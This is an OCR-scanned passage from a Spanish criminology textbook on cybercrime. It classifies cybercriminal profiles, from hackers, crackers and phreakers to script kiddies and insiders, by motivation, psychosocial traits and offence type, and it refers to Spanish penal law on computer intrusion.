mos ante un sujeto con competencias y aptitudes informáticas más especiali-
zadas, para quien el móvil principal del hecho delictivo puede ser el mero reto
de mejorar en la adquisición de conocimientos específicos; el segundo tipo es
mucho más pragmático, siendo un mero usuario de las nuevas tecnologías
para fines ilícitos y su motivación podrá ser muy heterogénea pero menos
elevada que en el primer supuesto, abarcando desde la venganza personal,
la posibilidad de obtener algún beneficio económico, la excitación sexual, etc.
Además, como puede observarse también se aprecia una diferencia fun-
damental en cuanto a la focalización del ataque: el perfil especializado tendrá
como objetivo principal el propio aspecto virtual, el sistema de información
en sí mismo o los programas que se encuentran en él, a través de los que ac-
cederá a los datos que necesita para perpetrar el delito y conseguir los fines
delictivos que se haya propuesto; por el contrario, el asalto realizado por el
perfil menos técnico tendrá una relación menos intensa con el ámbito infor-
mático, siendo la tecnología un mero instrumento para llegar al verdadero
objetivo. Dicho de otro modo, para el perfil especializado el objetivo es tanto
el ataque informático en sí mismo, lo que ya supone alcanzar la finalidad de
resolver el reto que le plantea la vulneración de los sistemas de seguridad in-
formática o la confección de un software malicioso, como los posibles réditos
de su conducta delictiva; para el perfil menos cualificado, el éxito del ataque
no es un fin en sí mismo puesto que habitualmente se lleva a cabo median-
te medios menos expeditivos o aprovechando la tecnología ya confeccionada
(no supone la consecución de ningún reto), sino un mero medio por el que se
alcanza el verdadero objetivo perseguido.
m. Predominio de la criminalidad grupal u organizada: los ciberdelin-
cuentes ya no actúan de manera individual, sino que operan como parte de
grandes organizaciones criminales. El 50% de las bandas dedicadas al ciber-
crimen se componen de 6 o más personas. El 50% de los grupos de ciber-
delincuentes han operado por más de seis meses, mientras que el 25% ha

- 93 -
Cibercriminalidad.
, 1•~11111 l11 p11 l , A P ·CT $PENALES YCRlMINOLÓGICOS DE LA CRlMINALlDAD RELACIONADA CON LAS TIC.

operado seis meses o menos. No existe información concreta sobre la tem-


poralidad de las actuaciones del 25% restante en el estudio, probablemente
debido a la ausencia de datos específicos o la falta de uniformidad y encaje en
la anterior clasificación sobre el periodo de actuación. La mayor parte de su
actividad se registra en Norteamérica y Sudamérica con un 19% del total de
ataques generados a nivel mundial.
En líneas generales, se puede compartir la idea expresada por algunos es-
tudios sobre el perfil del pirata informático de que entre ellos existe un fuer-
te vínculo con la tecnología, que consideran una vía de escape, una puerta a
nuevos retos interesantes e inesperados (versus la gris realidad) e, incluso, un
modo de obtener un poder al que no accederían en el mundo físico. Otra ca-
racterística importante para entender el pensamiento del hacker es la idea de
secretismo y anonimato (que puede llevar a la impunidad por la comisión de
un delito), de pertenencia a una subcultura underground "única", que se desa-
rrollaría en el ciberespacio y que trae consigo un desdoblamiento no patoló-
gico de personalidad (la virtual -que, además, puede ser múltiple- y la física),
una relajación o cambio de valores y moralidad tradicionales en el ciberespacio
(desinhibición online o separación moral), así como una ambivalente necesi-
dad de mantener en secreto los actos ilícitos y la necesidad de compartirlo con
el grupo de iguales o los medios en busca de reconocimiento. Respecto a este
último punto, si bien es frecuente la existencia de comunidades online a las que
el hacker puede pertenecer, lo más habitual es que estemos ante una suerte de
membresía fluida: el ciberespacio es más una red informal que una organiza-
ción formalmente establecida, por lo que sus fronteras son bastante permea-
bles, y la naturaleza de este tipo de red conduce a un alto nivel de rotación.
En cuanto a la prevención en materia de delincuencia informática en el
interior de las corporaciones, el estudio daba algunas pautas sobre las carac-
terísticas de los trabajadores susceptibles de perpetrar ataques informáticos:
• Personas que aprovechan espacios sociales para preguntar por datos
de clientes y demás información de uso restringido.
■ Personal que instala programas espías sin autorización.
• Sujetos que desactivan el software antivirus en su equipo de trabajo.
• Personas que hacen uso sin autorización de computadoras o disposi-
tivos de los demás miembros de la organización.
■ Empleados que se quedan a trabajar en horario extra en la oficina sin
dar justificación.
iv. Perfil psicosocial: en lo atinente a las relaciones y antecedentes fa -
miliares, la existencia de un mayor desarraigo o debilitación de los vínculos

- 94 -
Capitulo 3. PARTICULARIDADES DE LA CRIMTNALII Al) HHLA('l()NA I ACON LAS TIC

es superior a la media: padres ausentes o xc sivam nte protectores, fami-


lias desestructuras o disfuncionales, falta d t n ión o métodos de crianza
pobres, etc. En algunos casos, esto puede explicar 1 refugio del sujeto en el
ciberespacio y la dedicación a la adquisición de sus aptitudes y conocimien-
tos en el campo de la informática. Uno de los métodos de crianza deficientes
que se observan en la mayor parte de los supuestos es que a los padres no les
importa lo que sus hijos hacen con sus ordenadores, no existiendo control al
respecto.
Respecto a las relaciones con los pares, frecuentemente no se sienten
aceptados por sus compañeros, experimentando cierto sentimiento de aban-
dono. Prefieren lidiar con las computadoras, ya que las computadoras no son
críticas y no discriminan. Sin embargo, esto se torna completamente distinto
en el ciberespacio, donde pueden pertenecer a subculturas y comunidades
clandestinas, con las que comparten valores e intereses comunes, desarro-
llando un sentimiento de pertenencia. En estos grupos contraculturales pue-
den desarrollar nuevas escalas de valores (nettiqueta) y obtener referencias
morales que difieran con las habituales en el mundo físico .
Esta relación dentro de la subcultura virtual puede generar un caldo de
cultivo criminógeno en el que los sujetos pueden aprender que la piratería
informática es un acto aceptable o, en otros casos, técnicas de neutralización
que les ayudan a justificar sus conductas.
En cuanto a sus relaciones con la autoridad, en la mayor parte de los
casos los hackers - de uno u otro signo, criminales o no- han adoptado una
posición crítica ante el sistema político y económico. En el caso de los ciber-
criminales, es frecuente que consideren a los agentes de la autoridad que los
investigan como inferiores, sobre todo por su carencia de conocimientos téc-
nicos.
En referencia a su nivel educativo, tampoco existe homogeneidad: si
bien la mayor parte de los cibercriminales son curiosos y están dispuestos
a aprender, esto no significa necesariamente que quieran hacerlo a través de
los medios tradicionales. Muchos cibercriminales han tenido altas cotas de
fracaso escolar o, directamente, han abandonado sus estudios formales para
dedicarse a aprender sobre lo que realmente les interesa. En los estudios rea-
lizados hasta la fecha, los datos arrojan la evidencia de que en la mayor parte
de los casos, los hackers tienen un nivel de estudios algo superior a la media
de la población.
En general, puede afirmarse que hay una falta de investigación empírica
sobre las características de los delincuentes cibernéticos. Además, los estu-

- 95 -
Cibercrímínalidad.
• und parte. ASPECTOS PENALES y CRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

dios que se han realizado tienen limitaciones graves y se centran en un nú-


mero concreto de delitos. No se sabe si los delincuentes cibernéticos tienen
características diferentes a los delincuentes tradicionales, y no se sabe si las
características de los delincuentes interactúan con los motivos y la ejecución
de ciertos delitos informáticos y cómo lo hacen (LEUKFELDT, 2017) .
Una vez realizadas estas precisiones sobre las dificultades y especiali-
dades de la confección de un perfil criminal genérico para los cibercrimina-
les, conviene realizar a continuación una relación de las diferentes categorías
de perfiles criminales a los que la doctrina penal y criminológica ha dedica-
do sus investigaciones (FANJUL FERNÁNDEZ ET AL., 2018; Mrnó LUNARES, 2012; DE
LA CUESTA ARZAMENDI & PÉREZ MAcHío, 2010; CHIESA, Duce! & CIAPPI, 2009; RoGERS,
1999 y 2006).

2. Cibercriminales especializados

a) Hacker: en primer lugar, es necesario realizar una importante pre-


cisión: no debe confundirse el término hacker con el concepto amplio de ci-
bercriminal o ciberdelincuente. Por cibercriminal o ciberdelincuente enten-
demos a todo sujeto que perpetra un hecho delictivo utilizando como parte
central el ciberespacio, a través de las nuevas tecnologías informáticas o de
telecomunicaciones. Un hacker puede pertenecer a una categoría dentro de
los cibercriminales, pero no siempre cuando estemos ante un hacker podre-
mos etiquetarle como cibercriminal.
El término hacker proviene de finales de los años 50 y se debe a la pro-
liferación de un experto grupo de programadores que conseguían eliminar
programas que se encontraban ubicados dentro de un sistema operativo
(true hackers). Sin embargo, tales prácticas no tienen por qué tener un cariz
socialmente negativo o criminológicamente relevante.
Actualmente, el vocablo hacker, sin mayores precisiones, simplemente
hace referencia a un sujeto cualificado o grupo de expertos en informática y
redes, lo que incluye el dominio de áreas como la programación, hardware y
software, las telecomunicaciones, etc. Por otra parte, existe un concepto de
hacker mucho más estricto, que se refiere a aquel experto en informática que
busca superar barreras por el mero hecho de su existencia, sin entrar en el
campo de lo delictivo, en ocasiones incluso usando sus conocimientos para la
mejora de la seguridad de las redes y los sistemas (Mrnó LUNARES, 2012).
Además de ello, el hacker estaría especialmente interesado en la brecha
de seguridad de los sistemas de información y en los porqués de las vulnera-

- 96 -
Capitulo 3. PARTICULARIDADES DE LA CRIMINALIDAD IU! l,ACIONADA ON LAS TIC

1·ones de dichas medidas de seguridad informática. En principio, un hacker


puede dedicar sus conocimientos a intervenir o realizar alteraciones técnicas
1 n sistemas informáticos tanto de signo socialmente positivo como negativo.
Más aún, hoy en día muchos hackers se adscriben a su propio código de "mo-
r lidad en el mundo virtual" o ética del hacker, esto es, una especie de decálo-
o o manifiesto al que se adscriben para evitar que proliferen las conductas
d lictivas en su seno. En este sentido, los cibercriminales pertenecientes a la
tegoría de los hackers se configurarían como una subcultura criminal den-
ro de una subcultura, pues se oponen a unos valores propios de un círculo
minoritario que, a su vez, ha construido su propio conjunto de directrices al
margen de los valores del mundo físico.
Los hackers son verdaderos adeptos virtuales, creyentes convencidos
de los beneficios de las nuevas tecnologías en el espectro social. En general,
consideran los avances en el campo de la informática, las redes y las tele-
comunicaciones como algo universalmente positivo o "bueno en sí mismo".
Entienden que estos nuevos adelantos pueden ayudar a la mayor parte de la
población mundial, reducir las desigualdades y favorecer el intercambio li-
bre de información conectando a la gente de manera ilimitada. Por otra parte,
consideran que la informática es un campo abonado para la creatividad, el
arte y la belleza. En ocasiones llegan a definir su identidad a través de los
programas que crean o por sus "hacks", convirtiéndolos en signos de identi-
dad más importantes que otros rasgos biológicos, sociales o psicológicos. En
consecuencia, consideran todo avance en su área de conocimientos como un
reto intelectual capaz de motivarles más que las recompensas tradicionales
(aceptación social, patrimonio, etc.).
Como contrapartida, la mayor parte de los hackers considerarán un
agravio cualquier limitación a la utilización de las nuevas tecnologías. Es fre-
cuente que la mayor parte de ellos sienta una fuerte desconfianza hacia la
autoridad, a la que se verá como un interventor de corte represor.
Por el contrario, en su actuar, los hackers tradicionales suelen considerar
que lo importante de sus actividades -aun aquellas al margen de la legalidad
tradicional- es evidenciar cualquier falla de un sistema de información, por lo
que en muchas ocasiones desarrollan su actividad publicitándola (aun cuando
no ha sido solicitada por el propietario) y ofreciendo posibilidades de solución.
También es interesante el hecho de que la actual configuración de los
medios de control social formal haya derivado en una hipercriminalización
de la actividad hacker, toda vez que se tiene por delictivo cualquier intrusis-
mo en un sistema de información ajeno independientemente de la finalidad
con la que se realice y sin que sea necesaria la captación o dañado de datos.

- 97 -
Cibercriminalidad.
Segunda parte. ASPECTOS PENALES YCRJMINOLÓGICOS DE LA CRJMINALIDAD RELACIONADA CON LAS TIC.

Ej. 3.3: En la regulación incluida en el art. 197 bis del Codigo penal vigente
se considera delictiva cualquier intrusión informática, sin importar el método
o procedimiento utilizado, siempre que se vulneren las medidas de seguridad
establecidas y sin estar debidamente autorizado por quien esté legitimado para
excluir a terceros. Partiendo de esta redacción del delito de intrusión informá-
tica, cualquier hacker que se introduzca en un sistema informático explotando
una brecha de seguridad sin el consentimiento de su propietario, cometerá un
hecho delictivo, incluso aunque su intención no fuera obtener ningún tipo de
beneficio ilícito.

Del mismo modo que no existe un perfil genérico de cibercrirninal, no


existe un único perfil de hacker. Así, la doctrina ha realizado diferentes clasi-
ficaciones:
Según su filosofía o conforme al seguimiento o rechazo de las premisas
de la anteriormente mencionada ética del hacker, algunos autores distinguen
entre:
• White Hat Hackers, o hackers de sombrero blanco, son los dedicados
a estudiar la seguridad de los sistemas informáticos y fortalecer las
brechas de seguridad o errores (bugs) en los mismos, buscando la
mejora del sistema. A pesar de la imagen mediática del hacker asocial
o carente de habilidades sociales, los hackers de este tipo son bastan-
te activos en las Redes Sociales, pertenecen a comunidades de la Red
y se adscriben a un código de conducta en sus relaciones interperso-
nales online (nettiqueta), con las que frecuentemente intercambian
ideas, datos y herramientas.
• Los Grey Hat Hackers (sombrero gris), se dedican a traspasar los ni-
veles de seguridad de los sistemas informáticos y ofrecer sus servi-
cios como administradores de seguridad. Su finalidad no es altruista
corno en el caso de los White Hats Hackers, sino que se encuentra en-
caminada a conseguir mayores réditos profesionales.
• Finalmente, los Black Hat Hackers (sombreros negros), que se de-
dican a vulnerar la seguridad de sistemas, realizar intrusiones no
autorizadas e ilegales a sistemas privados con intenciones dañinas:
descubrir, revelar, apoderarse o dañar datos. Para ellos, violar un sis-
tema de información y extraer sus secretos, robar la información y
venderla fuera es un comportamiento normalizado.
b) Cracker, phreakers y cyberpunks: dentro de esta última categoría
-los Black Hat Hackers- se encuentran los crackers, término acuñado por los
propios hackers a finales de los años 80 del siglo pasado para diferenciarse

- 98 -
Capitulo 3. PARTICULARJDADESDELACRIMINALIDAD RllLA('I( NADA ON LAS'I I

de aquellos que realizaban acciones dafiinas o d li tivas a través del hacking.


Originalmente, cracker era aquel sujeto que eliminaba la protección de pro-
gramas de software comerciales (esto es, los crackeaba). Actualmente, los
crackers son hackers que realizan actividades con fines maliciosos, destructi-
vos (crack significa romper) o criminales modificando el comportamiento de
sistemas y redes. Según algunas investigaciones, su motivación suele ser eco-
nómica o de mero reconocimiento, y sus rasgos de la personalidad encajarían
con las del ególatra (obsesivos y afán destructivo e insaciable). A menudo han
mantenido algún tipo de relación con sus víctimas -físicas o jurídicas- en el
mundo físico o virtual, por lo que conocen perfectamente el entorno virtual
en el que se mueven. A diferencia de otros grupos de hackers, los crackers no
se adscriben a ningún tipo de ética propia del ciberspacio y suelen ser espe-
cialmente esquivos, relacionándose en grupos pequeños de difícil acceso.
Dentro de los crackers se han diferenciado, a su vez, algunas subcatego-
rías, fundamentalmente basadas en los recursos a los que pueden acceder o
a las actividades concretas que realizan, sin que se aporten, en la mayor par-
te de los casos, rasgos relevantes que ayuden a la identificación de su perfil:
crackers de sistemas. programadores y decoders que alteran el contenido de
un programa; crackers de criptografía (crackear códigos), crackers de carding
(uso ilegal de tarjetas de crédito), crackers de trashing (basureros, obtienen la
información de las papeleras de reciclaje), etc.
El denominado "fraude en el número de tarjeta de crédito" o carding, es una
técnica que consiste en apropiarse de los números de tarjetas de crédito, que gene-
ralmente se obtienen al violar los sistemas informáticos de los bancos o agencias
financieras, y usarlos para hacer llamadas de larga distancia o para comprar pro-
ductos sin el conocimiento del titular de la tarjeta.

Quizás las únicas dos subcategorías de crackers que aportan algo más
de información de cara a la confección de un perfil criminal son los phreakers
o phreackers, especializados en los sistemas de telefonía fija y móvil, redes
móviles, datos de usuarios, etc. También tienen conocimientos de hardware y
electrónica, lo que les permite construir o manipular equipos que interceptan
o realizan llamadas desde teléfonos móviles sin la aquiescencia de sus pro-
pietarios. Aunque en un primer momento sus actividades estaban motivadas
por el mero conocimiento, actualmente su motivación es fundamentalmente
económica con tintes activistas. Así, muchos de sus ataques tienen un trasfon-
do reivindicativo, lo que lleva a la comisión de delitos dirigidos contra las em-
presas de telefonía y las grandes multinacionales, organizaciones que, bajo su
punto de vista, estafan a sus clientes con facturas desmesuradas y servicios
insuficientes. A diferencia de los hackers, que se guían por su búsqueda de
un mayor conocimiento, su motivación es "extrínseca", normalmente basada

- 99 -
Cibercriminalidad.
YCRlMINOLÓGIC0S DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

• nómicos. Tampoco se encuentran constreñidos a ningún tipo


il1• ,•111111 ' n el mundo virtual, aunque a diferencia de otros subgrupos de
r•mck r suelen mantener importantes valores de justicia distributiva (con-
ld ran que las grandes multinacionales de telefonía móvil son un sistema
fraudulento que abusa de la población).
Algunos autores, como DE LA CUESTA ARZAMENDI & P ÉREZ MAcHlo (2010) no inclu-
yen a los phreakers dentro de los crackers, si bien admiten que "en el resto de los
aspectos son muy similares" a ellos.

Una categoría especialmente paradigmática dentro de los crackers son


los denominados Cyberpunks (lIAFNER & MARKoFF, 1995). Esta categoría, que
toma su nombre de una subcultura ficticia perteneciente a un subgénero de
la ciencia ficción, destaca por la inclusión de valores culturales propios de la
cultura punk, una visión distópica o negativa de la realidad y el sistema repre-
sentada por la máxima "low lije, high tech" (literalmente "bajo nivel de vida,
alta tecnología"). Paradójicamente, aunque se trata de sujetos muy apegados
a las nuevas tecnologías y que, de hecho, las utilizan para perpetrar funda-
m ntalmente actos vandálicos y destructivos en el ciberespacio, también se
muestran como un movimiento contracultural que siente una especial des-
confianza ante el uso de los avances informáticos. No se trata, en este aspecto,
de un movimiento reaccionario que proponga la vuelta a viejos valores, sino
de una corriente que advierte -muchas veces a través de sus acciones delic-
tivas- de los peligros de los aspectos más polémicos de la tecnología. Funda-
mentalmente, los cyberpunk contraponen la necesidad del progreso tecnoló-
gico con el proceso de eventual deshumanización que pueden acarrear. Otro
problema denunciado por la cultura cyberpunk sería la utilización de estas
nuevas tecnologías por parte de los poderosos como herramienta de exclu-
sión o marginación social.
Ciertamente, en este último aspecto, coincidimos con algunos autores
(PÉREZ SuAREz, 2015) que advierten que el estudio de los cibercrímenes y sus
perpetradores, los cibercriminales, se ha realizado desde una óptica sesgada
por parte de la Criminología, sin atender a todas las áreas de impacto de las
tecnologías digitales en cada una de las facetas del comportamiento humano.
A menudo se olvida el estudio de la relación emocional forjada entre la huma-
nidad y la tecnología digital (interfaz hombre/máquina).
La cultura cyberpunk se caracteriza también por una estética determina-
da, mezcla de anacronismos estéticos propios de la imagen punk y heavy de los
años 80 y 90, así como composiciones futuristas en la vestimenta y ornamentos
utilizados. La confluencia de los estilos underground del pasado reciente con el
uso de las nuevas tecnologías es el sello distintivo que permite diferenciar a los
cyberpunk de otros tipos de crackers.

- 100 -
Capítulo 3. PARTICULARIDADES DE LA CRIMINALIDAD ltEl,A 'IClNA A CON LAS TIC

En cuanto a sus actividades y perfil person l, caracterizan por comen-


!' sus acciones a una edad temprana, una menor sutileza en sus ataques in-
lt rmáticos y la afinidad con las redes en línea. En ocasiones han sido defini-
d como "vándalos de páginas web o sistemas informatizados". Aunque se
11 uestran mucho más propensos al puro nihilismo que otros grupos de crac-
k rs, muchos cyberpunk se oponen al sistema económico de las grandes cor-
1 raciones a través de sus ataques informáticos. Comparten, en este sentido,
1 lgunos objetivos comunes con los hacktivistas y los phreakers, si bien sus ac-
·lones suelen ser menos sutiles o centradas en la lucha contra los poderosos.
Ej. 3.4: La contracultura cyberpunk surge del movimiento de literatura de
ciencia ficción encabezado por autores como Sterling, Gibson y John Shirley du -
rante la década ele 1980 en el seno de la literatura ele ciencia ficción, siendo em-
pleado por primera vez en ese sentido por Gardner Dozoís en 1984.

La clasificación puede seguir en relación con la especialidad criminal del


iberdelincuente y así se han distinguido:
e) Viruckers: los creadores de virus informáticos reciben el combinado
pseudónimo de viruckers (término que no se utiliza en la lengua an-
glosajona). Su especialidad es, por tanto, la fabricación de programas
(malware) que permiten la intrusión en otros sistemas informáticos
o la destrucción y alteración de datos (daííos informáticos). Su modus
operandi consiste en introducir un virus informático en un sistema para
destruirlo, alterarlo o inutilizarlo. En cuanto a sus rasgos de persona-
lidad, les caracteriza su carácter individualista o solitario en el que no
existe una ética o sentimiento de comunidad. Algunos autores consi-
deran que muchos viruckers mantienen rasgos de carácter psicopático
"con una dinámica psíquica reflexiva con un estilo épico". Son un grupo
altamente peligroso y con una gran difusión. Más allá de estas caracte-
rísticas, un sector de la doctrina considera que los viruckers no constitu-
yen un perfil diferenciado de los crackers o los hackers, al entender que
se trata simplemente de una especialización por razón del programa in-
formático que desarrollan (Mrnú LLINARES, 2012).
d) Traficante de armas (traficante de malware, spyware, virus, etc.): se trata
de una especialización en el desarrollo y venta de programas malware,
virus y otras herramientas que permiten la intrusión en sistemas infor-
máticos ajenos. El traficante se especializa en su facilitación a terceros
para posibilitar la comisión de hechos delictivos. Normalmente operan en
mercados negros virtuales dentro de la Red Profunda (Deepweb) . Tam-
bién es frecuente que trafiquen con información o datos de terceros, cap-
tada en el ciberespacio (netrunners) mediante la técnica del denominado
"secuestro de datos" gracias a la utilización de ransomwares La principal
motivación de los traficantes de armas virtuales es el beneficio económico
y sus ataques pueden dirigirse tanto a empresas como a personas físicas.

- 101 -
Cibercriminalidad.
SYCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

) Banquero: se trata de piratas informáticos especializados en el robo de infor-


mación dentro del ámbito financiero. Posteriormente, podrán suministrar
a terceros esa información o venderla para obtener beneficios económicos.
Además de delitos relacionados con el espionaje financiero y el descubri-
miento o revelación de secretos, es frecuente que utilicen la usurpación de
identidad para robar las credenciales bancarias de los clientes (phising ).
f) Contratista o hackers for hire: se trata de sicarios o mercenarios del cibe-
respacio: hackers por contrato. Mediante precio o recompensa llevarán a
cabo determinados servicios para su cliente, que pueden ir desde el robo
de información hasta cualquier ataque informático a un sistema de infor-
mación, bien pertenezca a una persona física o a una persona jurídica. Sus
principales objetivos son económicos, pudiendo prestar sus servicios en
solitario o en grupo. No comparten la ética de los hackers de sombrero
blanco, siendo su principal motivación la obtención de un beneficio eco-
nómico. Pueden actuar de manera individual o en grupo.
g) Agente especial: podría decirse que estamos ante la élite de los crackers,
habiéndoseles otorgado el infame titulo de las "fuerzas especiales de los
hackers de sombrero negro". Se trata de sujetos con un nivel de especiali-
zación y conocimientos informáticos muy alto. Llevan a cabo amenazas
persistentes avanzadas y espionaje cibernético. Pueden pertenecer a
organizaciones criminales que les faciliten los recursos y el soporte que
necesitan. En otras ocasiones, pueden pertenecer a los servicios de inte-
ligencia de los Estados o ser contratados por gobiernos extranjeros para
atacar las infraestructuras críticas.
h) Ninjas e information warriors: hackers sigilosos que se infiltran en los
sistemas de datos de las grandes empresas para obtener información e
intercambiarla por dinero. La infiltración es un factor clave en sus ope-
raciones por lo que pueden actuar en grupo con un "topo" en la propia
empresa victima. Su organización se encuentra muy estructurada y je-
rarquizada, donde los lideres se convierten en agentes profesionales que
operan como las compañías legitimas que esperan atacar.
i) Ciber-soldados: se trata de hackers especializados en la guerra virtual, con
el objetivo final de inutilizar la capacidad militar de un oponente. Su co-
metido es principalmente militar, siendo su tarea principal la de penetrar
en los sistemas o redes de otro Estado con la intención de provocar daños,
interrupciones o explotaciones de datos.
j) Spammer: el spam puede definirse como la creación y difusión de mensa-
jes no deseados, en su mayoría publicitarios. Los hackers especializados
en la creación y distribución de esta clase de información reciben el nom-
bre de spammers.
k) Domainer: sujeto que compra y registra dominios con el fin de explotarlos
económicamente: inversores en nombres de dominio. En muchas ocasio-
nes, estos dominios son adquiridos por el domainer ante determinados
sucesos de especial repercusión mediática, utilizando nombres no regis-
trados. La principal actividad delictiva en la que pueden incurrir esta cla-
se de hackers es la estafa.

- 102 -
Capitulo 3. PARTICULARIDADES DE LA CRIMINALIDAO IHll.A( 'IONAUA C'CIN I A 11(

I) Espias Informáticos: especialistas n In lrllrusl n In~ rm ti ·a, 1 robo d


información, el sabotaje y el chantaj . En In m yor parte de los casos diri-
gen sus ataques contra empresas d I s tor privado ( espionaje industrial),
pero pueden atentar contra los sistema d información gubernamenta-
les.
11) Sniffer: hackers especializados en la confección y uso de programas de or-
denador capaces de controlar y analizar el tráfico red transmitido de una
localización de red a otra, con el objetivo de robar información (por ejem-
plo, en una red de empresa).
m) Terrorista informático o cyberterrorist: se trata de un terrorista con cono-
cimientos informáticos suficientes como para elevar la comisión de actos
y atentados terroristas al ciberespacio. Su intención será la de atentar
contra el orden estructural y constitucional del Estado al que ataca, nor-
malmente a través de ataques informáticos que generen terror en la po-
blación. La principal característica de este perfil es la motivación y justi-
ficación de los actos criminales por motivos como la religión, la economía
o la política.
n) Phisher: usurpadores y suplantadores de identidad. Su principal objeti-
vo es la obtención de datos personales, financieros, etc., de la víctima. Su
principal objetivo es el beneficio económico y su modus operandi más
habitual es el envío de correos electrónicos trampa con algún tipo de ma-
lware espía que les permite la extracción de los datos.
ñ) Hoaxer: en la era de Internet y las redes sociales, la información es poder.
Lasfake news, la denominada infoxicación, son conceptos de reciente acu-
ñado que están estrechamente relacionados con la velocidad a la que la
información puede ser subida a la red y viajar por ella. Los hoaxers son
que difunden bulos (hoax) o correos electrónicos en cadena con conteni-
do falso o engañoso y atrayente.
o) Hacktivista o anarquista: esta clase de hacker propugna la utilización no-
violenta de herramientas digitales ilegales o legalmente ambiguas persi-
guiendo fines políticos o sociales. Se consideran a sf mismos como hac-
kers de sombrero blanco, aunque sus actividades suelen estar prohibidas
en los ordenamientos jurídico penales. Sus principales objetivos son las
grandes corporaciones o los sistemas de información de los Estados. Su
lucha se encuentra imbuida de un código ético pro-social y de valores an-
tisistema, llegando a conocerse en ocasiones sus conductas como una mo-
dalidad de la desobediencia civil.

Sin embargo, en nuestra opinión, una posible crítica a esta clasificación


es la colisión existente entre el acto (cibercrimen en concreto o modus ope-
randi utilizado) y las características del autor de manera unívoca. El hecho de
que existan muchos modos de comisión no tiene porqué significar que a cada
uno de ellos le corresponda un perfil de ciberdelincuente concreto, con unas
características psicosociales específicas. No obstante, debe entenderse la an-
terior clasificación desde una perspectiva útil y estadísticamente relevante

- 103 -
Cibercriminalidad.
111111 JIIH 11 , ' l'.ECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

p ra la Criminología aplicada. El modus operandi de un sujeto se encuentra


entre los principales ítems a la hora de analizar su perfil criminal en la totali-
dad de las técnicas de perfilado criminal existentes en la actualidad. Aunque
el proceso inductivo de extraer determinadas características psicosociales
del delincuente a partir del acto concreto realizado ha sido criticado por un
importante sector de la doctrina criminológica, debido fundamentalmente a
lo subjetivo e intuitivo de la relación existente entre los dos valores, lo cierto
es que si se lleva a cabo a través de un proceso sistemático, con base en técni-
cas actuariales o estadísticas y por parte de equipos expertos en análisis de
conducta criminal compuestos por psicólogos y criminólogos, su efectividad
en la construcción de perfiles criminales a partir, entre otros factores, de la
actividad criminal realizada, tiene una fuerte base empírica y una efectividad
comprobada en múltiples investigaciones. En consecuencia, la recomenda-
ción que podría ofrecerse es que la confección de perfiles criminológicos a
partir de la actividad concreta nunca podrá sustituir al estudio individuali-
zado del ciberdelincuente, pero puede ser muy útil a la hora de establecer
perfiles criminológicos de cibercriminales desconocidos y ayudar a entender
mejor sus motivaciones y modus operandi.

3. El ciberdelincuente no especializado

a) Script kiddie: usuarios - normalmente jóvenes- que carecen de cono-


cimientos avanzados en el campo de la informática, pero que gracias al
uso de herramientas y programas creados por otros hackers más espe-
cializados, interrumpen en los sistemas informáticos. La búsqueda de
emociones y el riesgo que supone el reto de penetrar en terminales aj e-
nas es lo que motiva principalmente a estos iniciados. Actúan para lograr
notoriedad, realizando actividades que se aprovechan de las brechas de
seguridad de los sistemas. Realizan ataques informáticos (DoS y simila-
res) de robo de datos, daiíos informáticos o bloqueo de sistemas, general-
mente eligiendo las víctimas de manera aleatoria y carecen de objetivos
determinados. Los scriptkiddies no gozan de buena reputación entre los
hackers especializados y están etiquetados point-and-clickers (usuarios
de apuntar y hacer click) , y sus ataques se llaman despectivamente point-
and-click attacks, lo que viene a significar que hay muy poco razonamien-
to o estudio involucrado en los mismos.
b) Emugger: son el equivalente de la delincuencia de bagatela en el ciberes-
pacio. Se trata de un grupo numeroso que ha conseguido los conocimien-
tos necesarios para desarrollar programas maliciosos, con 1 fin de obte-
ner ganancias económicas.
e) Wannabe: aspirantes a hackers especializados, siendo ésta su principal
motivación para llevar a cabo actividades ilegales. Tienen un onocimien-
to y unas aptitudes informáticas más elevadas que los emugge rs, pero se
encuentran completando su aprendizaje como expertos.

- 104 -
Capítulo 3. PARTICULARIDADES DE LA CRIMJNA LIUAD RE ' ACIONADA CON LAS TIC

d) Poseur: aunque en ocasiones pu d confundirse con los wannabe, la di-


ferencia fundamental es que el poseur está más interesado en los réditos
de la imagen del hacker que en la sencla del mismo. Su principal motiva-
ción, por tanto, no será la de aumentar sus conocimientos informáticos,
sino tratar de ser admitido en el grupo para su propia vanagloria.
e) Newbie y lammer: el primero de los términos es utilizado para definir a
los novatos que aún no han alcanzado un nivel de conocimientos profun-
do. Se trata de la primera fase de iniciación en la carrera de hacker. El se-
gundo término - lammer- es utilizado de manera despectiva para definir a
aquellos sujetos que alardean de poseer conocimientos informáticos que
en verdad no tienen. Su perfil de personalidad se caracteriza por ostentar
poca madurez, falta de sociabilidad o habilidades, complejo de inferiori-
dad, falta de autoestima y necesidad de atención.

4. Clasificación de los ciberdelincuentes según su motivación y


tipología delictiva

Además de estas categorías, otros autores (Mraó LLINARES, 2012, FANJUL FER-
NANDEZ et al., 2018) destacan algunas características específicas del perfil de los
cibercriminales basadas en la motivación y tipología de ciberdelito cometida.
a) Cibercriminal económico: su principal motivación es obtener un be-
neficio económico directo o indirecto en el caso de que sean contratados por
grupos organizados. Entre ellos pueden diferenciarse:
el insider que pertenece o trabaja para la institución o empresa víc-
tima de la infracción (también se incluyen en esta categoría losan-
tiguos empleados que ya no forman parte de la compañía), cuyos
ataques informáticos (data breachers: destrucción, modificación o
acceso no autorizado a datos de la empresa) pueden tener una tasa
de éxito mucho mayor que los externos, dado que es más posible
que pasen desapercibidos y suponen un riesgo, por el mayor acceso
a la información;
el outsider, cualquier cibercriminal que no pertenece a la estructura
empresarial a la que ataca;
los grupos u organizaciones criminales tradicionales (mafias) y las
llamadas ciberbandas, conjunto estructurado de crackers;
y, por último, las denominadas cibermulas, que, si bien algún autor
ha sostenido que "no son, desde una perspectiva criminológica, ci-
bercriminales, puesto que no son autores del delito en el ciberespa-
cio sino colaboradores o recolectores de los beneficios en Internet
que luego envían por medios seguros de transmisión a los autores

- 105 -
CibercriminalldacL
Segunda parte. ASPECTOS PENALES YCRlMINOLÓGICOS DE LA RIMINAJ..lDAD RELACIONADA CON LAS TIC.

del delito (las ciberbandas) o a los r spons bles de los grupos orga-
nizados tradicionales que operan en Internet" (Mmó LUNARES, 2012),
lo cierto es que son esenciales en el d sarrollo de muchos fenóme-
nos delictivos que tienen su origen en el ciberespacio.
